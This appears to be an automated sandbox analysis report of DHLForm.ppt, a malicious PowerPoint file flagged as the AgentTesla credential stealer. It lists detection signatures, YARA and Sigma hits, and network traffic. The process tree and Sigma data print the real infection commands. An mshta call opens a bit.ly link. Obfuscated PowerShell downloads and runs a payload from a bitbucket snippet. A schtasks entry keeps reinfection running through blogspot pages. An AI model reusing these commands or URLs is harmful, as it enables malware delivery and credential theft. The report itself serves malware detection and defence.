Windows Analysis Report DHLForm.ppt

Overview

General Information

Sample Name: DHLForm.ppt
Analysis ID: 483878
MD5: 5a5ff1cffdb0ea343fd5ab32c6eeb740
SHA1: e372c4f53febe5c4d74a01eb6985e80a31d52e25
SHA256: 9e4134fbb243efdb6d965eec21d98b4ad702e7fca13b5f1af47d30e3b0019585
Tags: Powershell, ppt, PS-3losh-rat, Rat

Detection

AgentTesla
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Yara detected AgentTesla
Yara detected AntiVM3
Multi AV Scanner detection for submitted file
Sigma detected: Bad Opsec Defaults Sacrificial Processes With Improper Arguments
Compiles code for process injection (via .Net compiler)
Writes or reads registry keys via WMI
Injects a PE file into a foreign processes
Sigma detected: MSHTA Spawning Windows Shell
Writes registry values via WMI
Document exploit detected (process start blacklist hit)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Uses schtasks.exe or at.exe to add and modify task schedules
Writes to foreign memory regions
Creates a scheduled task launching mshta.exe (likely to bypass HIPS)
Sigma detected: Microsoft Office Product Spawning Windows Shell
Sigma detected: Mshta Spawning Windows Shell
Sigma detected: Suspicious Csc.exe Source File Folder
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Antivirus or Machine Learning detection for unpacked file
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Uses insecure TLS / SSL version for HTTPS connection
Document misses a certain OLE stream usually present in this Microsoft Office document type
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Potential document exploit detected (unknown TCP traffic)
Searches for the Microsoft Outlook file path
Drops PE files
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Compiles C# or VB.Net code
Connects to a URL shortener service
Creates a process in suspended mode (likely to inject code)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Document contains an embedded VBA macro which executes code when the document is opened / closed
Yara detected Credential Stealer
Found dropped PE file which has not been started or loaded
Potential document exploit detected (performs DNS queries)
Enables debug privileges
PE file does not import any functions
Installs a global mouse hook
Document contains embedded VBA macros
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Potential document exploit detected (performs HTTP gets)

Process Tree

  • System is w10x64
  • POWERPNT.EXE (PID: 256 cmdline: 'C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXE' /AUTOMATION -Embedding MD5: 68F52CD14C61DDC941769B55AE3F2EE9)
  • cmd.exe (PID: 3728 cmdline: C:\Windows\system32\cmd.exe /c 'C:\Users\user\Desktop\DHLForm.ppt' MD5: F3BDBE3BB6F734E357235F4D5898582D)
    • conhost.exe (PID: 3868 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • POWERPNT.EXE (PID: 3640 cmdline: 'C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXE' 'C:\Users\user\Desktop\DHLForm.ppt' /ou '' MD5: 68F52CD14C61DDC941769B55AE3F2EE9)
      • mshta.exe (PID: 5220 cmdline: MsHta https://bitly.com/yuiwqhdsavbdjagh MD5: 7083239CE743FDB68DFC933B7308E80A)
        • powershell.exe (PID: 6156 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -w h i'E'x(iwr('https://bitbucket.org/!api/2.0/snippets/san2dadas/pXXeE5/e23e954a26463214e00815516dbe9dd395d7e1fa/files/ayoola222') -useB); MD5: DBA3E6449E97D4E3DF64527EF7012A10)
          • conhost.exe (PID: 6200 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • csc.exe (PID: 2520 cmdline: 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\uz5edm2y\uz5edm2y.cmdline' MD5: 350C52F71BDED7B99668585C15D70EEA)
        • schtasks.exe (PID: 6212 cmdline: 'C:\Windows\System32\schtasks.exe' /create /sc MINUTE /mo 80 /tn ''SECOTAKSA'' /F /tr ''\''MsHtA''\''http://1230948%1230948@randikhanaekminar.blogspot.com/p/ayoola.html\'' MD5: 15FF7D8324231381BAD48A052F85DF04)
          • conhost.exe (PID: 6244 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • mshta.exe (PID: 6404 cmdline: MsHtA 'http://1230948%1230948@randikhanaekminar.blogspot.com/p/ayoola.html' MD5: 197FC97C6A843BEBB445C1D9C58DCBDB)
    • powershell.exe (PID: 6336 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -w h i'E'x(iwr('https://bitbucket.org/!api/2.0/snippets/san2dadas/pXXeE5/e23e954a26463214e00815516dbe9dd395d7e1fa/files/ayoola222') -useB);i'E'x(iwr('https://bitbucket.org/!api/2.0/snippets/san2dadas/pXXeE5/e23e954a26463214e00815516dbe9dd395d7e1fa/files/ayoola222') -useB);i'E'x(iwr('https://bitbucket.org/!api/2.0/snippets/san2dadas/pXXeE5/e23e954a26463214e00815516dbe9dd395d7e1fa/files/ayoola222') -useB); MD5: 95000560239032BC68B4C2FDFCDEF913)
      • conhost.exe (PID: 6340 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • csc.exe (PID: 5884 cmdline: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\a0uccovc\a0uccovc.cmdline' MD5: B46100977911A0C9FB1C3E5F16A5017D)
        • cvtres.exe (PID: 5216 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES797A.tmp' 'c:\Users\user\AppData\Local\Temp\a0uccovc\CSCCC0B7B204924196A28CF024B8788083.TMP' MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
      • RegAsm.exe (PID: 4276 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe MD5: 6FD7592411112729BF6B1F2F6C34899F)
  • powershell.exe (PID: 7044 cmdline: 'C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe' -w h i'E'x(iwr('https://bitbucket.org/!api/2.0/snippets/san2dadas/pXXeE5/e23e954a26463214e00815516dbe9dd395d7e1fa/files/ayoola222') -useB); MD5: 95000560239032BC68B4C2FDFCDEF913)
    • conhost.exe (PID: 7064 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • csc.exe (PID: 5844 cmdline: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\lmts0v03\lmts0v03.cmdline' MD5: B46100977911A0C9FB1C3E5F16A5017D)
      • cvtres.exe (PID: 5808 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES63A1.tmp' 'c:\Users\user\AppData\Local\Temp\lmts0v03\CSCCA8985A0394D48BFA864CA75A5282D3A.TMP' MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
    • RegAsm.exe (PID: 380 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe MD5: 6FD7592411112729BF6B1F2F6C34899F)
    • RegAsm.exe (PID: 5332 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe MD5: 6FD7592411112729BF6B1F2F6C34899F)
  • mshta.exe (PID: 4180 cmdline: 'C:\Windows\system32\MsHTa.exe' http://1230948%1230948@backbones1234511a.blogspot.com/p/ayoolaback.html' MD5: 197FC97C6A843BEBB445C1D9C58DCBDB)
  • mshta.exe (PID: 6448 cmdline: 'C:\Windows\system32\MsHTa.exe' https://startthepartyup.blogspot.com/p/backbone16.html' MD5: 197FC97C6A843BEBB445C1D9C58DCBDB)
  • mshta.exe (PID: 5900 cmdline: 'C:\Windows\system32\MsHTa.exe' http://1230948%1230948@ghostbackbone123.blogspot.com/p/ghostbackup15.html' MD5: 197FC97C6A843BEBB445C1D9C58DCBDB)
  • powershell.exe (PID: 6464 cmdline: 'C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe' -w h i'E'x(iwr('https://bitbucket.org/!api/2.0/snippets/san2dadas/pXXeE5/e23e954a26463214e00815516dbe9dd395d7e1fa/files/ayoola222') -useB);i'E'x(iwr('https://bitbucket.org/!api/2.0/snippets/san2dadas/pXXeE5/e23e954a26463214e00815516dbe9dd395d7e MD5: 95000560239032BC68B4C2FDFCDEF913)
    • conhost.exe (PID: 676 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • mshta.exe (PID: 6452 cmdline: 'C:\Windows\system32\MsHTa.exe' http://1230948%1230948@backbones1234511a.blogspot.com/p/ayoolaback.html' MD5: 197FC97C6A843BEBB445C1D9C58DCBDB)
  • mshta.exe (PID: 68 cmdline: 'C:\Windows\system32\MsHTa.exe' https://startthepartyup.blogspot.com/p/backbone16.html' MD5: 197FC97C6A843BEBB445C1D9C58DCBDB)
  • mshta.exe (PID: 5856 cmdline: 'C:\Windows\system32\MsHTa.exe' http://1230948%1230948@ghostbackbone123.blogspot.com/p/ghostbackup15.html' MD5: 197FC97C6A843BEBB445C1D9C58DCBDB)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000032.00000002.474315568.0000000003441000.00000004.00000001.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |
00000032.00000002.474315568.0000000003441000.00000004.00000001.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
00000032.00000002.462560709.0000000000402000.00000040.00000001.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |
00000032.00000002.462560709.0000000000402000.00000040.00000001.sdmp | JoeSecurity_AgentTesla_2 | Yara detected AgentTesla | Joe Security |
00000016.00000002.506840923.000001ACC5317000.00000004.00000001.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |

Unpacked PEs

Source | Rule | Description | Author | Strings
40.2.RegAsm.exe.400000.0.unpack | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |
40.2.RegAsm.exe.400000.0.unpack | JoeSecurity_AgentTesla_2 | Yara detected AgentTesla | Joe Security |
22.2.powershell.exe.1acc4f3f158.1.raw.unpack | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |
22.2.powershell.exe.1acc4f3f158.1.raw.unpack | JoeSecurity_AgentTesla_2 | Yara detected AgentTesla | Joe Security |
22.2.powershell.exe.1acc5317148.3.unpack | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |

Sigma Overview

System Summary:

Sigma detected: Bad Opsec Defaults Sacrificial Processes With Improper Arguments
  Source: Process started
  Author: Oleg Kolesnikov @securonix invrep_de, oscd.community, Florian Roth, Christian Burkard
  Data: Command: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, CommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, CommandLine|base64offset|contains: , Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, ParentCommandLine: 'C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe' -w h i'E'x(iwr('https://bitbucket.org/!api/2.0/snippets/san2dadas/pXXeE5/e23e954a26463214e00815516dbe9dd395d7e1fa/files/ayoola222') -useB);, ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7044, ProcessCommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, ProcessId: 380
Sigma detected: MSHTA Spawning Windows Shell
  Source: Process started
  Author: Michael Haag
  Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -w h i'E'x(iwr('https://bitbucket.org/!api/2.0/snippets/san2dadas/pXXeE5/e23e954a26463214e00815516dbe9dd395d7e1fa/files/ayoola222') -useB);, CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -w h i'E'x(iwr('https://bitbucket.org/!api/2.0/snippets/san2dadas/pXXeE5/e23e954a26463214e00815516dbe9dd395d7e1fa/files/ayoola222') -useB);, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: MsHta https://bitly.com/yuiwqhdsavbdjagh, ParentImage: C:\Windows\SysWOW64\mshta.exe, ParentProcessId: 5220, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -w h i'E'x(iwr('https://bitbucket.org/!api/2.0/snippets/san2dadas/pXXeE5/e23e954a26463214e00815516dbe9dd395d7e1fa/files/ayoola222') -useB);, ProcessId: 6156
Sigma detected: Microsoft Office Product Spawning Windows Shell
  Source: Process started
  Author: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team
  Data: Command: MsHta https://bitly.com/yuiwqhdsavbdjagh, CommandLine: MsHta https://bitly.com/yuiwqhdsavbdjagh, CommandLine|base64offset|contains: 2, Image: C:\Windows\SysWOW64\mshta.exe, NewProcessName: C:\Windows\SysWOW64\mshta.exe, OriginalFileName: C:\Windows\SysWOW64\mshta.exe, ParentCommandLine: 'C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXE' 'C:\Users\user\Desktop\DHLForm.ppt' /ou '', ParentImage: C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXE, ParentProcessId: 3640, ProcessCommandLine: MsHta https://bitly.com/yuiwqhdsavbdjagh, ProcessId: 5220
Sigma detected: Mshta Spawning Windows Shell
  Source: Process started
  Author: Florian Roth
  Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -w h i'E'x(iwr('https://bitbucket.org/!api/2.0/snippets/san2dadas/pXXeE5/e23e954a26463214e00815516dbe9dd395d7e1fa/files/ayoola222') -useB);, CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -w h i'E'x(iwr('https://bitbucket.org/!api/2.0/snippets/san2dadas/pXXeE5/e23e954a26463214e00815516dbe9dd395d7e1fa/files/ayoola222') -useB);, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: MsHta https://bitly.com/yuiwqhdsavbdjagh, ParentImage: C:\Windows\SysWOW64\mshta.exe, ParentProcessId: 5220, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -w h i'E'x(iwr('https://bitbucket.org/!api/2.0/snippets/san2dadas/pXXeE5/e23e954a26463214e00815516dbe9dd395d7e1fa/files/ayoola222') -useB);, ProcessId: 6156
Sigma detected: Suspicious Csc.exe Source File Folder
  Source: Process started
  Author: Florian Roth
  Data: Command: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\lmts0v03\lmts0v03.cmdline', CommandLine: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\lmts0v03\lmts0v03.cmdline', CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: 'C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe' -w h i'E'x(iwr('https://bitbucket.org/!api/2.0/snippets/san2dadas/pXXeE5/e23e954a26463214e00815516dbe9dd395d7e1fa/files/ayoola222') -useB);, ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7044, ProcessCommandLine: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\lmts0v03\lmts0v03.cmdline', ProcessId: 5844
Sigma detected: Possible Applocker Bypass
  Source: Process started
  Author: juju4
  Data: Command: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, CommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, CommandLine|base64offset|contains: , Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, ParentCommandLine: 'C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe' -w h i'E'x(iwr('https://bitbucket.org/!api/2.0/snippets/san2dadas/pXXeE5/e23e954a26463214e00815516dbe9dd395d7e1fa/files/ayoola222') -useB);, ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7044, ProcessCommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, ProcessId: 380
Sigma detected: Non Interactive PowerShell
  Source: Process started
  Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements)
  Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -w h i'E'x(iwr('https://bitbucket.org/!api/2.0/snippets/san2dadas/pXXeE5/e23e954a26463214e00815516dbe9dd395d7e1fa/files/ayoola222') -useB);, CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -w h i'E'x(iwr('https://bitbucket.org/!api/2.0/snippets/san2dadas/pXXeE5/e23e954a26463214e00815516dbe9dd395d7e1fa/files/ayoola222') -useB);, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: MsHta https://bitly.com/yuiwqhdsavbdjagh, ParentImage: C:\Windows\SysWOW64\mshta.exe, ParentProcessId: 5220, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -w h i'E'x(iwr('https://bitbucket.org/!api/2.0/snippets/san2dadas/pXXeE5/e23e954a26463214e00815516dbe9dd395d7e1fa/files/ayoola222') -useB);, ProcessId: 6156
Sigma detected: T1086 PowerShell Execution
  Source: Pipe created
  Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
  Data: PipeName: \PSHost.132762198332368709.6156.DefaultAppDomain.powershell

Jbx Signature Overview

AV Detection:

Multi AV Scanner detection for submitted file
Source: DHLForm.ppt | Virustotal: Detection: 22%
Source: DHLForm.ppt | ReversingLabs: Detection: 22%
Source: 40.2.RegAsm.exe.400000.0.unpack | Avira: Label: TR/Spy.Gen8
Source: unknown | HTTPS traffic detected: 104.192.141.1:443 -> 192.168.2.3:49778 version: TLS 1.0
Source: unknown | HTTPS traffic detected: 104.192.141.1:443 -> 192.168.2.3:49786 version: TLS 1.0
Source: unknown | HTTPS traffic detected: 104.192.141.1:443 -> 192.168.2.3:49840 version: TLS 1.0
Source: C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXE | File opened: C:\Windows\SysWOW64\MSVCR100.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows

Software Vulnerabilities:

Document exploit detected (process start blacklist hit)
Source: C:\Program Files (x86)\Microsoft Office\Office16\POWERPNT.EXE | Process created: C:\Windows\SysWOW64\mshta.exe
Source: global traffic | TCP traffic: 192.168.2.3:49743 -> 67.199.248.15:443
Source: global traffic | DNS query: name: bitly.com
Source: global traffic | TCP traffic: 192.168.2.3:49743 -> 67.199.248.15:443
Source: powerpnt.exe | Memory has grown: Private usage: 0MB later: 49MB
Source: unknown | HTTPS traffic detected: 104.192.141.1:443 -> 192.168.2.3:49778 version: TLS 1.0
Source: unknown | HTTPS traffic detected: 104.192.141.1:443 -> 192.168.2.3:49786 version: TLS 1.0
Source: unknown | HTTPS traffic detected: 104.192.141.1:443 -> 192.168.2.3:49840 version: TLS 1.0
Source: global traffic | HTTP traffic detected:
    GET /yuiwqhdsavbdjagh HTTP/1.1
    Accept: */*
    Accept-Language: en-US
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
    Host: bitly.com
    Connection: Keep-Alive
Source: global traffic | HTTP traffic detected:
    GET /p/ayoolaayoola.html HTTP/1.1
    Accept: */*
    Accept-Language: en-US
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
    Connection: Keep-Alive
    Host: johonathahogyaabagebarhomeintum.blogspot.com
                      Source: global trafficHTTP traffic detected: GET /static/v1/jsbin/3101730221-analytics_autotrack.js HTTP/1.1Accept: */*Referer: https://www.blogger.com/blogin.g?blogspotURL=https%3A%2F%2Fjohonathahogyaabagebarhomeintum.blogspot.com%2Fp%2Fayoolaayoola.html&type=blog&bpli=1Accept-Language: en-USAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: www.blogger.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /blogblog/data/1kt/simple/body_gradient_tile_light.png HTTP/1.1Accept: */*Referer: https://johonathahogyaabagebarhomeintum.blogspot.com/p/ayoolaayoola.htmlAccept-Language: en-USAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: resources.blogblog.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /img/share_buttons_20_3.png HTTP/1.1Accept: */*Referer: https://johonathahogyaabagebarhomeintum.blogspot.com/p/ayoolaayoola.htmlAccept-Language: en-USAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: www.blogger.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /blogblog/data/1kt/simple/gradients_light.png HTTP/1.1Accept: */*Referer: https://johonathahogyaabagebarhomeintum.blogspot.com/p/ayoolaayoola.htmlAccept-Language: en-USAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: resources.blogblog.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /s/opensans/v23/mem5YaGs126MiZpBA-UN_r8OUuht.eot HTTP/1.1Accept: */*Referer: https://www.blogger.com/blogin.g?blogspotURL=https%3A%2F%2Fjohonathahogyaabagebarhomeintum.blogspot.com%2Fp%2Fayoolaayoola.html&type=blog&bpli=1Accept-Language: en-USAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: fonts.gstatic.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /img/blogger-logotype-color-black-1x.png HTTP/1.1Accept: */*Referer: https://www.blogger.com/blogin.g?blogspotURL=https%3A%2F%2Fjohonathahogyaabagebarhomeintum.blogspot.com%2Fp%2Fayoolaayoola.html&type=blog&bpli=1Accept-Language: en-USAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: www.blogger.comConnection: Keep-AliveCookie: _ga=GA1.2.833016469.1631746236; _gid=GA1.2.19021443.1631746236
                      Source: global trafficHTTP traffic detected: GET /s/roboto/v27/KFOmCnqEu92Fr1Mu4mxO.eot HTTP/1.1Accept: */*Referer: https://www.blogger.com/blogin.g?blogspotURL=https%3A%2F%2Fjohonathahogyaabagebarhomeintum.blogspot.com%2Fp%2Fayoolaayoola.html&type=blog&bpli=1Accept-Language: en-USAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: fonts.gstatic.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /p/ayoola.html HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Connection: Keep-AliveHost: randikhanaekminar.blogspot.com
                      Source: global trafficHTTP traffic detected: GET /dyn-css/authorization.css?targetBlogID=4778963473423104316&zx=f202e5b7-10a8-4731-a0ba-0a7b50381b0c HTTP/1.1Accept: */*Referer: https://randikhanaekminar.blogspot.com/p/ayoola.htmlAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: www.blogger.comConnection: Keep-AliveCookie: _gid=GA1.2.19021443.1631746236; _ga=GA1.2.833016469.1631746236
                      Source: global trafficHTTP traffic detected: GET /js/cookienotice.js HTTP/1.1Accept: */*Referer: https://randikhanaekminar.blogspot.com/p/ayoola.htmlAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: randikhanaekminar.blogspot.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /blogin.g?blogspotURL=https://randikhanaekminar.blogspot.com/p/ayoola.html&type=blog HTTP/1.1Accept: */*Referer: https://randikhanaekminar.blogspot.com/p/ayoola.htmlAccept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: www.blogger.comConnection: Keep-AliveCookie: _gid=GA1.2.19021443.1631746236; _ga=GA1.2.833016469.1631746236
